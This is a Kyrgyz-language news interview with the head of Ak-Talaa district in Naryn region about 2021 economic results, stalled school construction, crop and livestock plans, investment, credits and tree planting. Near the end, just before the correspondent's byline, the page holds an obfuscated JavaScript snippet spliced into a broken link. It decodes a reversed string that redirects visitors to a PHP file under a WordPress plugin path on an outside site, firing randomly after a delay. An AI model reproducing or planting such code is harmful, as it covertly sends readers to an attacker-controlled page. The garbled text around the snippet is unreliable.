Жумадилла Жапаров: «Эң башкы каалоом – калк мүдөөсүн талбай аткаруу»

7-март, 2022-ж. / Редакция / Жаңылыктар 46

Нарын облусунун Ак-Талаа районунун администрациясынын башчысы–аким Жумадилла Жапаров.

Абийири таза жетекчилер менен иш билги кадрлар гана өлкөбүздү өнүктүрүп алдыга жылдыра алат. Аймактарды өнүктүрүү үчүн жогорку тарапты карап олтура бербестен, колдо бар мүмкүнчүлүктөрдү пайдаланып, азык-түлүк коопсуздугун камсыздап, жакырчылыкты жоюп, жаңыча ойлонуп иш жүргүзгөн жетекчилер жок эмес. Нарын облусунун Ак-Талаа районун өнүктүрүү максатында аткарылган иш-аракеттер туурасында райондун жетекчиси, аким Жапаров Жумадилла Курсанбаевич менен маектештик.

– Өткөн жылды кандай экономикалык көрсөткүчтөр менен жыйынтыктадыңыздар?

– Өткөн жылдын жыйынтыгы боюнча 42 млн 598 миң сомдук өнөр жай продукциялары өндүрүлүп 105,6 пайызды түздү. Салык боюнча план 52 млн 484 миң сом болсо, 54 млн 800 миң сомдон ашык жыйналды. Жалпы мамлекеттик бюджет 104,4 пайызга аткарылды.

– Мектеп, бала бакча, маданият үйү, медициналык мекемелер ж.б. объектилердин ал-абалы кандай?

– Райондогу жалпы социалдык объектилердин абалдары негизинен орточо деңгээлде. Бирок, айрым айылдардагы мектептер авариялык абалга кептелген жана окуучулар батпай үч нөөмөт менен окуп жаткан учурлар да жок эмес. Чолок-Кайың айылындагы Календеров атындагы орто мектептин курулушу 2015-жылы эле башталган, бирок ушул күнгө чейин бүтпөй токтоп турат. Мындан сырткары Кош-Дөбө айылындагы Э.Мейманов атындагы орто мектебинин спорттук залы каражаттын жоктугунан жумушу токтогон. Терек айылындагы орто мектептин спорттук залы, Тоголок Молдо айылындагы орто мектебинин капиталдык ремонту, Ак-Тал айылындагы бала бакчанын имаратына берилүүчү акча каражаттар кечеңдеп, курулуш иштери токтоп турат. Быйылкы жылы аракеттенип Кош-Дөбө айылына заманбап эки кабаттуу оорукананын пайдубалын түптөп, курулушун баштоо алдында турабыз. Ушул эле айылга жаңы бала бакчанын курулушун баштасакпы деген планыбыз да бар. Мындан сырткары, Тоголок Молдо айылы менен Баетов айылына да бала бакча салуу үчүн аракеттер көрүлүүдө.

– Азык-түлүк коопсуздугун камсыз кылуу максатында айдоо жерлерин кеңейтүү, арык-каналдарды тазалоо, сапаттуу үрөн, жер семирткичтерди алып келүү, асыл тукум малдарды өстүрүү багытында кандай жумуштар жасалууда?

– Ак-Талаа району боюнча жалпы 22272 баш ири мүйүздүү мал, 135813 баш кой-эчки, 15143 баш жылкы бар экендиги, быйылкы жылдагы санактын жыйынтыгы менен такталды. Райондо жалпы 15635 гектар айдоо аянты бар. Быйылкы жылга дан эгиндерин жалпы 40270 гектарга жана мунун ичинен 10810 гектарына буудай, 20460 гектарга арпа, 80 гектарга софлор айдоону пландаштырып жатабыз. Көп жылдык чөптөн 11020 гектарга, 152 гектарга картошка айдоону жана 69 гектарга жашылча айдоону көздөп турабыз. Мунун бардыгы, азык-түлүк коопсуздугун камсыз кылуу багытында болмокчу. Эмки кезек, жазгы талаачылык иштери боюнча жаңы сорттогу сапаттуу үрөндөрдү алып келүү үчүн Россия менен макулдашылган. Министрлер Кабинетинин №309 токтому боюнча да, бир катар иштерди алып баруудабыз жана тактоо иштерин бүтүрдүк. Райондо жалпы 2256 гектар кайра бөлүштүрүү фондусунун (ФПС) жери бар. Мунун 75 пайызы 1692 гектарды түзөт жана бүгүнкү күндө келишимдердин мөөнөттөрүн бүтүрүүгө аракеттер жасалууда. Келишимдин мөөнөттөрү аяктаары менен жерди Айыл чарба министрлигинин карамагына өткөрүп берип, чогуу иш алып барабыз. Алынган жерлерди үрөнчүлүк чарбага, асыл тукум малдарды көбөйтүп өстүрүүгө, айыл чарба кооперативдерин өнүктүрүүгө басым жасалат деген ишеничтебиз. Баетов айылындагы «Талаа Булак» СПАсына 48 тонна аммофос, 52 тонна кормовид, 100 тонна жер семирткич СПАларды колдоо долбоору менен келип кампада турат жана жаз алды менен дыйкандарга таратылып берилмекчи. Жазгы талаачылык жумуштарын райондогу арыктарды, каналдарды, суу сактагычтарды тазалап ремонттоп жатабыз. Район боюнча 100 чакырым аралыктагы канал-арыктарды механикалык тазалоо жумуштарын баштадык. 285 чакырым ички арыктарды кол жумуштары, ашар жолу менен тазалоону пландаштыруудабыз. Акыркы мезгилдерде, райондо малдын асылдуулугуна көңүл бурула баштады.

– Районго инвестиция тартуу менен айыл аймактарын дотациядан чыгарып, бюджеттин көлөмүн көбөйтүп, өсүшүнө өбөлгө түзүү боюнча кандай иш-аракеттер болууда?

– Ак-Талаа районунда 2021-жылы, жалпысынан 131 млн 827 миң сомдук инвестиция тартылды. Мунун ичинен, республикалык бюджеттен 58 млн сом, жергиликтүү бюджеттен 18 млн 300 миң сом, эл аралык уюмдардан 41 млн 958 миң сомдук инвестиция жана жергиликтүү фонддордон, демөөрчүлөрдөн 13 млн сом келип түштү. Өткөн жылы айыл чарбасын колдоо багытындагы 9 программаны ишке ашыруу максатында «Айыл банк» тарабынан мал чарбасына 10 пайыздык өлчөм менен 8 млн 300 миң сомдук жана талаачылыкка да 3 млн 100 миң сомдук, жалпы 11 млн 400 миң сомдук кредиттер берилди. Ушуга эле удаа, РСК банкы аркылуу дагы жалпы 23 дыйкан-фермерге 44 млн 730 миң сомдук жеңилдетилген кредиттер берилди.

– Көрктөндүрүү-жашылдан-дыруу иштерине кандай көңүл бурулууда?

– Өткөн жылы Ак-Талаа токой чарбасы тарабынан 21650 даана бак-дарактардын көчөттөрү айыл өкмөттөргө, мекеме-ишканаларга таратылып берилген. Мындан сырткары ийне жалбырактуу карагайдын 130 даанасы токой чарбасы аркылуу отургузулду. Айылдын тургундарына, мекеме-уюмдарга да мөмө жемиштерди арбын тигип өстүрүү боюнча пландарды иштеп чыгып, жаз алды менен киришебиз. Айрыкча алма, өрүк, кара өрүк жана мол түшүм берүүчү карагаттын, чычырканактын көчөттөрүн олтургузууну пландап жатабыз.

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/03/04_03-1.pdf»>2022-жылдын 4-марты
Кадыркул Бугубаев,
Нарын облусу боюнча өз кабарчы

7-март, 2022-ж. / Редакция / Жаңылыктар 46
Бөлүшүү: Telegram WhatsApp X